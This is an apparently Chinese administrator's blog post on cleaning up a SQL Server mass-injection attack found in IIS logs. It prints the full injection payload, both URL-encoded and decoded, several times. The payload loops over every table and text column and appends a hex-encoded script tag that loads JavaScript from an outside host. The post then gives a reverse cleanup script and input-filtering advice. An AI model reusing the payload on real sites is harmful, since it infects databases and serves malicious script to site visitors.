其实这个本身还是利用网站安全漏洞进行注入的
所以大家一定要加强网站提交数据或传参时候的控制。。一定要严格处理。尽量避免使用“+“号运算符链接sql语句并执行
下边说下解决方法把。我的是03服务器,数据库是sql server 2005(貌似遭殃的都是sql server)
首先,打开你的iis日志,如果没有改动的话应该在
c:\windows\system32\logfiles\httperr\
目录下
按时间最近的开始查,在里边查找declare(因为它使用的是动态sql语句,所以必须定义变量)
不要怕费时。。怕费事的话可以用《文本替换专家查找》
找到以后,会发现有这样一条记录
2008-05-06 21:07:53 a.a.a.a 34717 b.b.b.b 80 HTTP/1.1 GET /showtree.aspx?topicid=56008&postid=414578;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- - 3 Timer_MinBytesPerSecond 进程池
红色部分是错误文件,大家一定要修复,仔细检查。。确认无漏洞
其中a.a.a.a是访问者(可能是攻击者)的ip,b.b.b.b服务器IP
其中你会发现
1
;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;
这就是被注入的语句。很强大啊。呵呵;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;但是很乱,因为是经过URL编码的。。我们用UrlDecode方法解密后得到的代码,我们把前后的分号都去掉看
1dEcLaRe @t vArChAr(255),@c vArChAr(255) --定义变量
2dEcLaRe tAbLe_cursoR cUrSoR --游标
3FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) --遍历表和字段
4oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c --打开游标
5while(@@fEtCh_status=0) --开始
6bEgIn
7--这里执行更新操作呢。。注意
--
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(co
nvert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))')
8fEtCh next FrOm tAbLe_cursoR iNtO @t,@c --下一条记录
9eNd --结束
10cLoSe tAbLe_cursoR --还不错,把游标给关了
11dEAlLoCaTe tAbLe_cursoR --再次感谢
大家都知道上边进行了什么操作了吧。。dEcLaRe @t vArChAr(255),@c vArChAr(255) --定义变量2
dEcLaRe tAbLe_cursoR cUrSoR --游标3
FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) --遍历表和字段4
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c --打开游标5
while(@@fEtCh_status=0) --开始6
bEgIn 7--这里执行更新操作呢。。注意
--
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(co
nvert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') 8
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c --下一条记录9
eNd --结束10
cLoSe tAbLe_cursoR --还不错,把游标给关了11
dEAlLoCaTe tAbLe_cursoR --再次感谢这就是我们数据库里无缘无故多了东西的原因
下边说一下怎么恢复数据库
首先说明下,不一定完全奏效,因为在插入数据的时候,有些被强制揭去了一部分。。大家最好有备份
其实很简单,把刚才的语句反写就可以了
作此操作钱为了避免数据丢失请先备份数据库,每个人可能被注入的内容不一样,一定要变通,从第一步做起
1dEcLaRe @t vArChAr(255),@c vArChAr(255)
2dEcLaRe tAbLe_cursoR cUrSoR
3FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
4oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
5while(@@fEtCh_status=0)
6bEgIn
7exec('UpDaTe ['+@t+'] sEt ['+@c+']=replace(convert(varchar,['+@c+']),cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)),'''')')
8fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
9eNd
10cLoSe tAbLe_cursoR
11dEAlLoCaTe tAbLe_cursoR
12
dEcLaRe @t vArChAr(255),@c vArChAr(255) 2
dEcLaRe tAbLe_cursoR cUrSoR 3
FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) 4
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c 5
while(@@fEtCh_status=0) 6
bEgIn 7
exec('UpDaTe ['+@t+'] sEt ['+@c+']=replace(convert(varchar,['+@c+']),cAsT(0x3C2F7469746C653E223E3C736372697074207372633D687474703A2F2F2536312533312533382533382532452537372537332F312E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)),'''')') 8
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c 9
eNd 10
cLoSe tAbLe_cursoR 11
dEAlLoCaTe tAbLe_cursoR12
好了,检查下数据库吧
最根本的解决方法还是加强sql语句的过滤,加强html脚本的过滤